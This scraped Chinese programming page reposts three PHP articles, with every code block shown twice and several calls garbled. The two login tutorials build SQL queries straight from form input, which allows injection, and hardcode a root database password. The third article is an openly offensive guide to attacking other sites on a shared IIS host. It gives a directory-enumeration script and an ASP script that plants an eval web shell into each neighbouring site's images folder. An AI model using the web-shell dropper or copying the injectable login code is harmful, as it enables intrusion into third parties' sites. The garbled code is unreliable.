当前位置: 编程技术>php
本页文章导读:
▪php中session登录验证的例子 php中session登录验证的例子,供大家学习参考。
一、登录页面:
代码如下:
<html>
<head>
<title>Login</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</he.........
▪php使用 cookie 登录验证的例子 1、登录页面 login.html
代码如下:
<html>
<head>
<title>Login</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head><body>
<form name="form1" method="post".........
▪php写的寻找二层目录的小程序 iis7下的虚拟主机里有上万个站,只有脚本权限,没命令行权限,但是可以跨目录写文件。
如果能得到目标站的物理目录,便可以搞定了。但是苦于无法找到物理路径,所以只能用脚本来找了.........
[1]php中session登录验证的例子
来源: 互联网 发布时间: 2013-12-24
php中session登录验证的例子,供大家学习参考。
一、登录页面:
代码如下:
<html>
<head>
<title>Login</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head><body>
<form name="form1" method="post" action="/blog_article/login.html">
<table width="300" border="0" align="center" cellpadding="2" cellspacing="2">
<tr>
<td width="150"><div align="right">用户名:</div></td>
<td width="150"><input type="text" name="username"></td>
</tr>
<tr>
<td><div align="right">密码:</div></td>
<td><input type="password" name="passcode"></td>
</tr>
<tr>
<td><div align="right">Cookie保存时间:</div></td>
<td><select name="cookie" id="cookie">
<option value="0" selected>浏览器进程</option>
<option value="1">保存1天</option>
<option value="2">保存30天</option>
<option value="3">保存365天</option>
</select></td>
</tr>
</table>
<p align="center">
<input type="submit" name="Submit" value="Submit">
<input type="reset" name="Reset" value="Reset">
</p>
</form>
</body>
</html>
<head>
<title>Login</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head><body>
<form name="form1" method="post" action="/blog_article/login.html">
<table width="300" border="0" align="center" cellpadding="2" cellspacing="2">
<tr>
<td width="150"><div align="right">用户名:</div></td>
<td width="150"><input type="text" name="username"></td>
</tr>
<tr>
<td><div align="right">密码:</div></td>
<td><input type="password" name="passcode"></td>
</tr>
<tr>
<td><div align="right">Cookie保存时间:</div></td>
<td><select name="cookie" id="cookie">
<option value="0" selected>浏览器进程</option>
<option value="1">保存1天</option>
<option value="2">保存30天</option>
<option value="3">保存365天</option>
</select></td>
</tr>
</table>
<p align="center">
<input type="submit" name="Submit" value="Submit">
<input type="reset" name="Reset" value="Reset">
</p>
</form>
</body>
</html>
二、登录检测页
代码如下:
<?php
@mysql_connect()("localhost", "root","1981427") //选择数据库之前需要先连接数据库服务器
or die("数据库服务器连接失败");
@mysql_select_db("test") //选择数据库mydb
or die("数据库不存在或不可用");
//获取用户输入
$username = $_POST['username'];
$passcode = $_POST['passcode'];
//执行SQL语句获得Session的值
$query = @mysql_query()("select username, userflag from users "
."where username = '$username' and passcode = '$passcode'")
or die("SQL语句执行失败");
//判断用户是否存在,密码是否正确
if($row = mysql_fetch_array($query))
{
session_start(); //标志Session的开始
//判断用户的权限信息是否有效,如果为1或0则说明有效
if($row['userflag'] == 1 or $row['userflag'] == 0)
{
$_SESSION['username'] = $row['username'];
$_SESSION['userflag'] = $row['userflag'];
echo "<a href="/blog_article/main.html" href="/blog_article/main.html">欢迎登录,点击此处进入欢迎界面</a>";
}
else //如果权限信息无效输出错误信息
{
echo "用户权限信息不正确";
}
}
else //如果用户名和密码不正确,则输出错误
{
echo "用户名或密码错误";
}
?>
@mysql_connect()("localhost", "root","1981427") //选择数据库之前需要先连接数据库服务器
or die("数据库服务器连接失败");
@mysql_select_db("test") //选择数据库mydb
or die("数据库不存在或不可用");
//获取用户输入
$username = $_POST['username'];
$passcode = $_POST['passcode'];
//执行SQL语句获得Session的值
$query = @mysql_query()("select username, userflag from users "
."where username = '$username' and passcode = '$passcode'")
or die("SQL语句执行失败");
//判断用户是否存在,密码是否正确
if($row = mysql_fetch_array($query))
{
session_start(); //标志Session的开始
//判断用户的权限信息是否有效,如果为1或0则说明有效
if($row['userflag'] == 1 or $row['userflag'] == 0)
{
$_SESSION['username'] = $row['username'];
$_SESSION['userflag'] = $row['userflag'];
echo "<a href="/blog_article/main.html" href="/blog_article/main.html">欢迎登录,点击此处进入欢迎界面</a>";
}
else //如果权限信息无效输出错误信息
{
echo "用户权限信息不正确";
}
}
else //如果用户名和密码不正确,则输出错误
{
echo "用户名或密码错误";
}
?>
三、注销登录页
代码如下:
<?php
unset($_SESSION['username']);
unset($_SESSION['passcode']);
unset($_SESSION['userflag']);
echo "注销成功";
?>
unset($_SESSION['username']);
unset($_SESSION['passcode']);
unset($_SESSION['userflag']);
echo "注销成功";
?>
四、成功登录提示页
代码如下:
<?php
session_start();
if(isset()($_SESSION['username']))
{
@mysql_connect("localhost", "root","1981427") //选择数据库之前需要先连接数据库服务器
or die("数据库服务器连接失败");
@mysql_select_db("test") //选择数据库mydb
or die("数据库不存在或不可用");
//获取Session
$username = $_SESSION['username'];
//执行SQL语句获得userflag的值
$query = @mysql_query("select userflag from users "
."where username = '$username'")
or die("SQL语句执行失败");
$row = mysql_fetch_array($query);
//判断当前数据库中的权限信息与Session中的信息比较,如果不同则更新Session的信息
if($row['userflag'] != $_SESSION['userflag'])
{
$_SESSION['userflag'] = $row['userflag'];
}
//根据Session的值输出不同的欢迎信息
if($_SESSION['userflag'] == 1)
echo "欢迎管理员".$_SESSION['username']."登录系统";
if($_SESSION['userflag'] == 0)
echo "欢迎用户".$_SESSION['username']."登录系统";
echo "<a href="/blog_article/logout.html" href="/blog_article/logout.html">注销</a>";
}
else
{
echo "您没有权限访问本页面";
}
?>
session_start();
if(isset()($_SESSION['username']))
{
@mysql_connect("localhost", "root","1981427") //选择数据库之前需要先连接数据库服务器
or die("数据库服务器连接失败");
@mysql_select_db("test") //选择数据库mydb
or die("数据库不存在或不可用");
//获取Session
$username = $_SESSION['username'];
//执行SQL语句获得userflag的值
$query = @mysql_query("select userflag from users "
."where username = '$username'")
or die("SQL语句执行失败");
$row = mysql_fetch_array($query);
//判断当前数据库中的权限信息与Session中的信息比较,如果不同则更新Session的信息
if($row['userflag'] != $_SESSION['userflag'])
{
$_SESSION['userflag'] = $row['userflag'];
}
//根据Session的值输出不同的欢迎信息
if($_SESSION['userflag'] == 1)
echo "欢迎管理员".$_SESSION['username']."登录系统";
if($_SESSION['userflag'] == 0)
echo "欢迎用户".$_SESSION['username']."登录系统";
echo "<a href="/blog_article/logout.html" href="/blog_article/logout.html">注销</a>";
}
else
{
echo "您没有权限访问本页面";
}
?>
[2]php使用 cookie 登录验证的例子
来源: 互联网 发布时间: 2013-12-24
1、登录页面 login.html
代码如下:
<html>
<head>
<title>Login</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head><body>
<form name="form1" method="post" action="/blog_article/login.html">
<table width="300" border="0" align="center" cellpadding="2" cellspacing="2">
<tr>
<td width="150"><div align="right">用户名:</div></td>
<td width="150"><input type="text" name="username"></td>
</tr>
<tr>
<td><div align="right">密码:</div></td>
<td><input type="password" name="passcode"></td>
</tr>
<tr>
<td><div align="right">Cookie保存时间:</div></td>
<td><select name="cookie" id="cookie">
<option value="0" selected>浏览器进程</option>
<option value="1">保存1天</option>
<option value="2">保存30天</option>
<option value="3">保存365天</option>
</select></td>
</tr>
</table>
<p align="center">
<input type="submit" name="Submit" value="Submit">
<input type="reset" name="Reset" value="Reset">
</p>
</form>
</body>
</html>
<head>
<title>Login</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head><body>
<form name="form1" method="post" action="/blog_article/login.html">
<table width="300" border="0" align="center" cellpadding="2" cellspacing="2">
<tr>
<td width="150"><div align="right">用户名:</div></td>
<td width="150"><input type="text" name="username"></td>
</tr>
<tr>
<td><div align="right">密码:</div></td>
<td><input type="password" name="passcode"></td>
</tr>
<tr>
<td><div align="right">Cookie保存时间:</div></td>
<td><select name="cookie" id="cookie">
<option value="0" selected>浏览器进程</option>
<option value="1">保存1天</option>
<option value="2">保存30天</option>
<option value="3">保存365天</option>
</select></td>
</tr>
</table>
<p align="center">
<input type="submit" name="Submit" value="Submit">
<input type="reset" name="Reset" value="Reset">
</p>
</form>
</body>
</html>
2、登录检测页 login.php
代码如下:
<?php
@mysql_connect()("localhost", "root","1981427") //选择数据库之前需要先连接数据库服务器
or die("数据库服务器连接失败");
@mysql_select_db("test") //选择数据库mydb
or die("数据库不存在或不可用");
//获取用户输入
$username = $_POST['username'];
$passcode = $_POST['passcode'];
$cookie = $_POST['cookie'];
//执行SQL语句
$query = @mysql_query()("select username, userflag from users "
."where username = '$username' and passcode = '$passcode'")
or die("SQL语句执行失败");
//判断用户是否存在,密码是否正确
if($row = mysql_fetch_array($query))
{
if($row['userflag'] == 1 or $row['userflag'] == 0) //判断用户权限信息是否有效
{
switch($cookie) //根据用户的选择设置cookie保存时间
{
case 0: //保存Cookie为浏览器进程
setcookie("username", $row['username']);
break;
case 1: //保存1天
setcookie("username", $row['username'], time()+24*60*60);
break;
case 2: //保存30天
setcookie("username", $row['username'], time()+30*24*60*60);
break;
case 3: //保存365天
setcookie("username", $row['username'], time()+365*24*60*60);
break;
}
header("location: main.php"); //自动跳转到main.php
}
else
{
echo "用户权限信息不正确";
}
}
else
{
echo "用户名或密码错误";
}
?>
@mysql_connect()("localhost", "root","1981427") //选择数据库之前需要先连接数据库服务器
or die("数据库服务器连接失败");
@mysql_select_db("test") //选择数据库mydb
or die("数据库不存在或不可用");
//获取用户输入
$username = $_POST['username'];
$passcode = $_POST['passcode'];
$cookie = $_POST['cookie'];
//执行SQL语句
$query = @mysql_query()("select username, userflag from users "
."where username = '$username' and passcode = '$passcode'")
or die("SQL语句执行失败");
//判断用户是否存在,密码是否正确
if($row = mysql_fetch_array($query))
{
if($row['userflag'] == 1 or $row['userflag'] == 0) //判断用户权限信息是否有效
{
switch($cookie) //根据用户的选择设置cookie保存时间
{
case 0: //保存Cookie为浏览器进程
setcookie("username", $row['username']);
break;
case 1: //保存1天
setcookie("username", $row['username'], time()+24*60*60);
break;
case 2: //保存30天
setcookie("username", $row['username'], time()+30*24*60*60);
break;
case 3: //保存365天
setcookie("username", $row['username'], time()+365*24*60*60);
break;
}
header("location: main.php"); //自动跳转到main.php
}
else
{
echo "用户权限信息不正确";
}
}
else
{
echo "用户名或密码错误";
}
?>
3、登录成功验证页面
代码如下:
<?php
session_start();
if(isset()($_COOKIE['username']))
{
@mysql_connect("localhost", "root","1981427") //选择数据库之前需要先连接数据库服务器
or die("数据库服务器连接失败");
@mysql_select_db("test") //选择数据库mydb
or die("数据库不存在或不可用");
//获取Session
$username = $_COOKIE['username'];
//执行SQL语句获得userflag的值
$query = @mysql_query("select userflag from users "
."where username = '$username'")
or die("SQL语句执行失败");
$row = mysql_fetch_array($query);
//获得用户权限信息
$flag = $row['userflag'];
//根据userflag的值输出不同的欢迎信息
if($flag == 1)
echo "欢迎管理员".$_SESSION['username']."登录系统";
if($flag == 0)
echo "欢迎用户".$_SESSION['username']."登录系统";
echo "<a href="/blog_article/logout.html" href="/blog_article/logout.html">注销</a>";
}
else
{
echo "您没有权限访问本页面";
}
?>
session_start();
if(isset()($_COOKIE['username']))
{
@mysql_connect("localhost", "root","1981427") //选择数据库之前需要先连接数据库服务器
or die("数据库服务器连接失败");
@mysql_select_db("test") //选择数据库mydb
or die("数据库不存在或不可用");
//获取Session
$username = $_COOKIE['username'];
//执行SQL语句获得userflag的值
$query = @mysql_query("select userflag from users "
."where username = '$username'")
or die("SQL语句执行失败");
$row = mysql_fetch_array($query);
//获得用户权限信息
$flag = $row['userflag'];
//根据userflag的值输出不同的欢迎信息
if($flag == 1)
echo "欢迎管理员".$_SESSION['username']."登录系统";
if($flag == 0)
echo "欢迎用户".$_SESSION['username']."登录系统";
echo "<a href="/blog_article/logout.html" href="/blog_article/logout.html">注销</a>";
}
else
{
echo "您没有权限访问本页面";
}
?>
4、注销登录
代码如下:
<?php
setcookie("username");
echo "注销成功";
?>
setcookie("username");
echo "注销成功";
?>
[3]php写的寻找二层目录的小程序
来源: 互联网 发布时间: 2013-12-24
iis7下的虚拟主机里有上万个站,只有脚本权限,没命令行权限,但是可以跨目录写文件。
如果能得到目标站的物理目录,便可以搞定了。但是苦于无法找到物理路径,所以只能用脚本来找了。
两个程序,php与asp版的,供大家学习参考。
1、php版
代码如下:
<?php
set_time_limit(0);
$path = 'D:/Hosting';
$somefile = $_GET['key'];
$logfile = 'D:/Hosting/6668835/html/images/ennumdir.txt';
if (!isset()($_SERVER['PHP_AUTH_USER'])) {
header('WWW-Authenticate: Basic realm="My Realm"');
header('HTTP/1.0 401 Unauthorized');
echo 'Text to send if user hits Cancel button';
exit;
} else {
if(is_dir($path) && is_readable($path))
{
$path2 = '';
$handle = opendir($path);
while(false !== ($filename = readdir($handle)))
{
if($filename{0} != $_GET['dir'])
{
continue;
}
/*
if($filename{1} != $_GET['two'])
{
continue;
}
*/
//$path2 = $path.'/'.$filename.'/html';
$path2 = $path.'/'.$filename;
if(is_dir($path2) && is_readable($path2))
{
@$handle2 = opendir($path2);
while(false !== ($filename2 = readdir($handle2)))
{
if($filename2 == $somefile)
{
//echo'[+]Found !'.$filename2."\n";
file_put_contents($logfile,'[+]Found !'.$path2.'/'.$filename2."\n",FILE_APPEND);
}
}
@closedir($handle2);
}
}
file_put_contents($logfile,'[*]LAST '.$path2."\n",FILE_APPEND);
closedir($handle);
}
}
?>
set_time_limit(0);
$path = 'D:/Hosting';
$somefile = $_GET['key'];
$logfile = 'D:/Hosting/6668835/html/images/ennumdir.txt';
if (!isset()($_SERVER['PHP_AUTH_USER'])) {
header('WWW-Authenticate: Basic realm="My Realm"');
header('HTTP/1.0 401 Unauthorized');
echo 'Text to send if user hits Cancel button';
exit;
} else {
if(is_dir($path) && is_readable($path))
{
$path2 = '';
$handle = opendir($path);
while(false !== ($filename = readdir($handle)))
{
if($filename{0} != $_GET['dir'])
{
continue;
}
/*
if($filename{1} != $_GET['two'])
{
continue;
}
*/
//$path2 = $path.'/'.$filename.'/html';
$path2 = $path.'/'.$filename;
if(is_dir($path2) && is_readable($path2))
{
@$handle2 = opendir($path2);
while(false !== ($filename2 = readdir($handle2)))
{
if($filename2 == $somefile)
{
//echo'[+]Found !'.$filename2."\n";
file_put_contents($logfile,'[+]Found !'.$path2.'/'.$filename2."\n",FILE_APPEND);
}
}
@closedir($handle2);
}
}
file_put_contents($logfile,'[*]LAST '.$path2."\n",FILE_APPEND);
closedir($handle);
}
}
?>
2、asp版
代码如下:
<%
Server.ScriptTimeout=500000000
key = Trim(Request.QueryString("key"))
msg=" <% eval(rquese(Chr(35)))%" &">"
Set FSO=Server.CreateObject("Scripting.FileSystemObject")
Set ServerFolder=FSO.GetFolder("C:\intel")
Set ServerFolderList=ServerFolder.subfolders
For Each ServerFileEvery IN ServerFolderList
' Response.write ServerFileEvery&"</br>"
If LCase(Left(ServerFileEvery.name, 1)) = LCase(key) Then
Set sServerFolder=FSO.GetFolder(ServerFileEvery)
Set sServerFolderList=sServerFolder.subfolders
For Each sServerFileEvery IN sServerFolderList
If LCase(sServerFileEvery.name) = "images" Then
StreamSaveToFile sServerFileEvery & "\google.asp", msg, "UTF-8"
End If
Next
End If
Next
Function StreamSaveToFile(sPath, sContent, sCharSet)
Dim oStream
If(InStr(sPath, ":") <= 0)Then
sPath = Replace(sPath, ",", ",")
sPath = Server.MapPath(sPath)
sPath = Replace(sPath, ",", ",")
End If
Set oStream = Server.CreateObject("Adodb.Stream")
With oStream
.Type = 2
.Mode = 3
.Open
.Charset = sCharSet
.WriteText sContent
.SaveToFile sPath, 2
.Close
End With
Set oStream = Nothing
End Function
%>
Server.ScriptTimeout=500000000
key = Trim(Request.QueryString("key"))
msg=" <% eval(rquese(Chr(35)))%" &">"
Set FSO=Server.CreateObject("Scripting.FileSystemObject")
Set ServerFolder=FSO.GetFolder("C:\intel")
Set ServerFolderList=ServerFolder.subfolders
For Each ServerFileEvery IN ServerFolderList
' Response.write ServerFileEvery&"</br>"
If LCase(Left(ServerFileEvery.name, 1)) = LCase(key) Then
Set sServerFolder=FSO.GetFolder(ServerFileEvery)
Set sServerFolderList=sServerFolder.subfolders
For Each sServerFileEvery IN sServerFolderList
If LCase(sServerFileEvery.name) = "images" Then
StreamSaveToFile sServerFileEvery & "\google.asp", msg, "UTF-8"
End If
Next
End If
Next
Function StreamSaveToFile(sPath, sContent, sCharSet)
Dim oStream
If(InStr(sPath, ":") <= 0)Then
sPath = Replace(sPath, ",", ",")
sPath = Server.MapPath(sPath)
sPath = Replace(sPath, ",", ",")
End If
Set oStream = Server.CreateObject("Adodb.Stream")
With oStream
.Type = 2
.Mode = 3
.Open
.Charset = sCharSet
.WriteText sContent
.SaveToFile sPath, 2
.Close
End With
Set oStream = Nothing
End Function
%>
最新技术文章: